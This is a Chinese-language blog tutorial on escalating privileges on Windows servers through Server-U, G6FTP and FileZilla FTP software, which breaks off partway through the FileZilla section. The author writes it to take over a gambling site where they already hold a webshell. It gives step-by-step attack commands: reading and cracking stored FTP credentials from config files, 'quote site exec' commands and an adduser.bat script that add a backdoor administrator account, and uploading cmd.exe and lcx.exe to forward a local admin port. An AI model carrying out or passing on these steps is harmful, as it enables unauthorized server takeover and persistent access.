windows提权之ftp提权

0，起因，由于前几天拿了一个菠菜站的webshell，但是只有iis权限，执行无法创建用户等操作，更无法对整个服务器进行控制了，于是此时便需要提权了，对于一个刚刚入门的小白来说，此刻真正意识到了提权的重要性，于是便开始学习提取相关知识，以拿下该菠菜的站点。

提权前的准备工作

1，通常来说，不同的脚本所处的权限是不一样的。这就意味着，如果该站点支持权限更高的脚本，我们可以上传该权限更高的脚本的大马，进而拿到更高的权限。

• asp/php 通常为匿名权限(网络服务权限)
• aspx 通常为user权限
• jsp 通常为系统权限

2，提权中常常也需要进行信息收集：

• 内外网
• 服务器系统和版本位数
• 服务器的补丁情况
• 服务器的安装软件情况
• 服务器的防护软件情况
• 端口情况
• 所支持的脚本情况
• ...............................等等

3，windows信息收集中常用的命令：

ipconfig /all    查看当前ip net user         查看当前服务器账号情况 netstat -ano     查看当前服务器端口开放情况 ver              查看当前服务器操作系统 systeminfo       查看当前服务器配置信息（补丁情况） tasklist /svc    查看当前服务器进程情况 taskkill -pid pid号  结束某个pid号的进程 taskkill /im qq.exe /f 结束qq进程，如果对命令不清楚，可以使用taskkill /? 进行查看 net user v01cano v01cano /add 添加一个用户名为v01cano密码为v01cano的用户 net localgroup administrators v01cano /add 将用户v01cano添加到管理员组 whoami                   查看当前操作用户（当前权限）  query user          查看管理员的登入时间

4，FTP软件提权：

常见的FTP软件有server-u，g6ftp，filezilla。

server-u提权

• Server -u的默认端口为43958

server-u提权常用方法,一：

1，查看默认安装目录下的ServUDaemon.ini文件，进而查看用户名和密码，将密码去cmd5.com找到对应的server-u的解密方式进行解密。

2，登入ftp，执行如下命令，创建用户，并且加入到管理员组。

quote site exec net user v01cano v01cano /add  quote site exec net localgroup administrators v01cano /add

server-u提权常用方法二：

1，使用大马直接创建ftp账号，使用ftp账号登入ftp。

2，然后再执行如下命令，创建系统账号。

quote site exec net user v01cano v01cano /add  quote site exec net localgroup administrators v01cano /add

server-u提权常用方法三：

server-u的管理员账号权限较大，相当于系统权限，可以通过管理员账号直接创建用户，并且加入到管理员组。

g6ftp提权：

科普：g6ftp的默认端口为8021，只侦听在127.0.0.1的8021端口上，所以无法从外部直接访问，需要进行端口转发。

1，查找管理配置文件Remote.ini，将administrator管理密码解密。解密得到administrator的管理员密码为123456

2，首先进行查找该网站的可读可写目录，然后上传cmd.exe和lcx.exe到该目录下。

3，查看网站根目录的权限得知，此处网站的根目录可读可写，直接上传到网站跟目录即可。上传成功后，即可直接通过cmd.exe调用lcx.exe命令，查看lcx.exe的用法。

然后通过如下命令转发端口，将127.0.0.1的8021端口通过8427端口转发出去：

4，转发成功后，通过g6ftp软件进行连接，以管理员用户登入

连接成功：

5，创建用户并设置权限和执行批处理文件

创建用户：右键，选择new user

选择根目录为c盘：

赋予全部权限：

然后将批处理文件adduser.bat上传到目标站点中：
adduser.bat中的文件内容为：即新建一个用户名和密码均为v01cano的用户，并且加入到管理员组中。

net user v01cano v01cano /add net localgroup administrators v01cano /add

然后在g6ftp软件中加入批处理命令：

然后在控制台登录ftp，并且执行所加入的批处理命令：命令成功执行：

在目标机上查看，新建用户成功，并且成功加入到了管理员组。

提权成功。

filezilla提权：

科普：filezilla默认端口为14147端口

1，找到默认安装目录下面有两个敏感文件filezillaserver.xml(包含了用户信息)和filezillaserver interface.xml(包含了管理信息)，查看用户名和密码：